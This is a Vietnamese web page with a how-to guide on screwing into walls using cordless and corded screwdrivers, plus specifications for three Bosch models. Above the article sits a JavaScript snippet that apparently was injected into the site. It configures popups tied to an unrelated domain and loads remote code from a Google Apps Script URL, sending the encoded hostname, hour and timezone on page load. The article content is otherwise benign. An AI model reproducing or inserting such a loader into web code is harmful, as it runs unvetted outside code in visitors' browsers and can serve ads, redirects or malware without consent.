var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Hướng dẫn cách bắt vít vào tường an toàn, đúng kỹ thuật

Tường là một bề mặt vật liệu tương đối cứng nên khi khoan bắt vít vào tường chúng ta cần lưu ý để đảm bảo mũi khoan đi đúng hướng, cho ra đường khoan đẹp mắt, đồng thời đảm bảo an toàn, tránh làm gãy mũi khoan hay rung lắc máy khi thi công. Nếu chưa nắm rõ cách thực hiện, hãy cùng theo dõi bài viết dưới đây để biết cách bắt vít vào tường đúng kỹ thuật nhất.

Cách chọn mũi vít phù hợp để bắt vít vào tường

Để bắt vít vào tường, thông thường chúng ta cần đến sự trợ giúp của máy vặn vít – dòng máy được tích hợp 2 chức năng làm việc chính là khoan và bắt vít chuyên nghiệp.

>> Xem thêm: Máy bắn vít khoan tường Bosch nên chọn loại nào?

Bên cạnh đó, việc lựa chọn mũi vít sao cho phù hợp cũng vô cùng quan trọng. Hiện nay trên thị trường có rất nhiều loại mũi vít, đáp ứng nhu cầu bắt vặn ốc vít trên nhiều bề mặt vật liệu khác nhau.

Một số loại phổ biến có thể kể đến như: mũi vít gỗ, mũi vít kim loại, mũi vít bê tông, thạch cao, vít cho vật liệu có tải trọng lớn,… Trong đó, người ta thường sử dụng mũi vít bê tông và mũi vít thạch cao để bắt vít vào tường.

Mũi vít bê tông

Đây là loại mũi vít có độ cứng cao, được sản xuất nhằm đáp ứng các yêu cầu bắt vít trên vật liệu cứng như bê tông, tường, khối xây nề. Ngoài ra, người dùng cũng có thể sử dụng nó để làm việc trên bề mặt vật liệu như gỗ, kim loại.

Để đáp ứng tốt nhất cho nhu cầu vặn vít trên vật liệu cứng thì vít bê tông thường được làm từ chất liệu thép không gỉ, hoặc thép cacbon màu xanh lam, có lớp phủ chống ăn mòn. Bên cạnh đó, đầu vít cũng có rãnh tương thích với các chụp vít ăn khớp hơn.

Mũi vít thạch cao

Vít thạch cao là sự lựa chọn của nhiều thợ sửa chữa, xây dựng nhà chuyên nghiệp. Mũi vít này có nhiều kích thước khác nhau và có thể tương thích với hầu hết các loại máy khoan vặn vít cầm tay hiện nay. Do bề mặt thạch cao không quá cứng nên khi sử dụng mũi vít này để thao tác cũng đơn giản, dễ dàng hơn.

Cách bắt vít vào tường bằng máy bắt vít dùng pin

Hiện nay, xu hướng sử dụng máy bắt vít dùng pin phổ biến hơn nhiều so với máy bắt vít dùng điện bởi khả năng làm việc linh hoạt, không bị phụ thuộc bởi điện lưới cố định nên có thể sử dụng linh động ở nhiều không gian khác nhau.

Dưới đây là hướng dẫn khoan tường bắt vít trên tường mà các bạn có thể tham khảo:

Bước 1: Kiểm tra máy đã được sạc đầy pin hay chưa trước khi sử dụng. Tiếp đó lắp pin vào máy đúng với các tiếp điểm. Test thử khả năng vận hành của máy ở chế độ không tải để đảm bảo máy hoạt động ổn định.

Bước 2: Chọn mũi vít tường phù hợp lắp vào máy bằng cách đưa mũi vít vào chính tâm trên đầu lục giác, đảm bảo mũi vít được lắp đủ chặt để khi vít đi chính tâm, không lung lay làm mất an toàn khi vận hành.

Bước 3: Bạn chọn chiều siết vít hoặc đảo vít tùy thuộc theo yêu cầu công việc

Bước 4: Nhấn cò máy để bắt đầu làm việc, điều chỉnh tốc độ điện tử khi bạn cần vít nhanh hoặc chậm.

Cách sử dụng máy bắt vít bằng pin để bắt vít vào tường khá đơn giản, kể cả người dùng không có kinh nghiệm, mới sử dụng máy khoan bắt vít lần đầu cũng có thể tiến hành dễ dàng.

>> Xem thêm: Nên mua máy vặn vít nào: dùng pin hay dùng điện tốt hơn?

Hướng dẫn sử dụng máy bắn vít điện để bắt vít tường

Cách bắt ốc vít vào tường chính xác đúng kỹ thuật, bạn có thể làm theo các hướng dẫn dưới đây:

Bước 1: Kết nối dây dẫn điện của máy bắt vít với nguồn điện. Hiện nay các máy vặn vít tại Việt Nam đều sử dụng nguồn điện 220V nên bạn chỉ cần cắm trực tiếp vào ổ điện mà không cần đến thao tác chuyển đổi điện.

Bước 2: Kiểm tra khả năng hoạt động của máy bằng cách cho máy chạy ở không tải trước.

Bước 3: Lựa chọn mũi bắt vít tường phù hợp để lắp vào máy. Thao tác lắp tương tự như máy bắt vít dùng pin

Bước 4: Nhấn công tắc để khởi động máy, điều chỉnh tốc độ điện tử khi bạn muốn máy hoạt động nhanh hay chậm. Ngoài ra, khi bạn nhấn hết cỡ công tắc và nhấn đồng thời nút giữ cò, máy sẽ tự động chạy mà không cần bạn phải nhân giữ cò liên tục.

Top 3 máy bắt vít tường bán chạy nhất hiện nay

Máy bắt vít thạch cao Bosch GTB 650

Bosch GTB 650 là máy bắt vít dùng điện chuyên dụng để vặn tháo ốc vít trên các vật liệu mềm xốp như tường thạch cao, gỗ hay thép mỏng.

Máy có khả năng chịu lực tốt, cách điện và chống rung hiệu quả, đáp ứng tốt nhiều yêu cầu khác nhau của người sử dụng cũng như đảm bảo an toàn cho người dùng khi sử dụng.

Khả năng làm việc của máy bắt vít GTB 650 bạn có thể tham khảo trong thông số kỹ thuật dưới đây:

  • Công suất: 650W
  • Bit ống cặp: lục giác trong 1/4″
  • Tốc độ không tải: 0 – 5.000 vòng/phút
  • Mô-men xoắn: 12Nm
  • Đường kính vít sắt: 6mm
  • Đường kính vít tường: 4mm

Máy khoan vặn vít dùng pin Bosch GSB 180-LI

Bosch GSB 180-LI là máy vặn vít dùng pin sở hữu mức điện áp 18V mạnh mẽ nên có thể làm việc tốt trên các bề mặt vật liệu cứng như tường dễ dàng. Đặc biệt, ngoài khả năng bắt vít, chiếc máy này còn có thể thực hiện được các yêu cầu khoan dễ dàng trên nhiều vật liệu khác nhau, giúp bạn hoàn thành nhiều công việc hơn. Có thể nói là một sản phẩm 2 trong 1 mà bất kỳ người dùng gia đình, thợ xây dựng, sửa chữa điện nước, xưởng cơ khí,… nào cũng không nên bỏ qua.

Chi tiết về khả năng làm việc của thiết bị bạn có thể xem trong phần dưới đây:

  • Điện áp pin: 18 V
  • Đầu kẹp: 13mm
  • Dung lượng pin: 1.5 Ah
  • Tốc độ đập: 27.000 lần/phút
  • Tốc độ không tải: 0 – 450/0 – 1700 vòng / phút
  • Mô-men xoắn, tối đa (cứng/mềm): 21/54 Nm
  • Đường kính khoan tối đa trên gỗ: 35mm
  • Đường kính khoan tối đa trên thép: 10mm
  • Đường kính vít tối đa: 10mm
  • Đường kính khoan tối đa trên bê tông: 10mm

Máy bắt ốc vít dùng pin Bosch GDX 180-LI

Bosch GDX 180-LI là máy siết bu lông – vặn vít 2 trong 1. Thiết bị sở hữu đầu khẩu kép: đầu lục giác trong 1/4″ và đầu vuông ngoài 1/2″ cho phép người dùng vừa có thể bắt vít, vừa có thể siết bu lông, thậm chí là thực hiện khoan khi cần thiết.

Để biết rõ hơn về khả năng làm việc của GDX 180-LI, các bạn có thể xem thông số kỹ thuật sau:

  • Điện áp pin: 18V
  • Đầu kẹp: đầu lục giác trong 1/4″ và đầu vuông ngoài 1/2″
  • Tốc độ đập: 0-3.600 lần/phút
  • Tốc độ không tải: 0-2.800 vòng/ phút
  • Mô-men xoắn: 180 Nm
  • Đường kính vít tối đa: M 6 – M 14

Trên đây là cách bắt vít vào tường đúng kỹ thuật và an toàn nhất cho bạn nào chưa biết. Nếu còn bất cứ vấn đề gì cần được giải đáp, hãy liên hệ với chúng tôi qua hotline 0904 810 817 – 0979 244 335 để được tư vấn và hỗ trợ.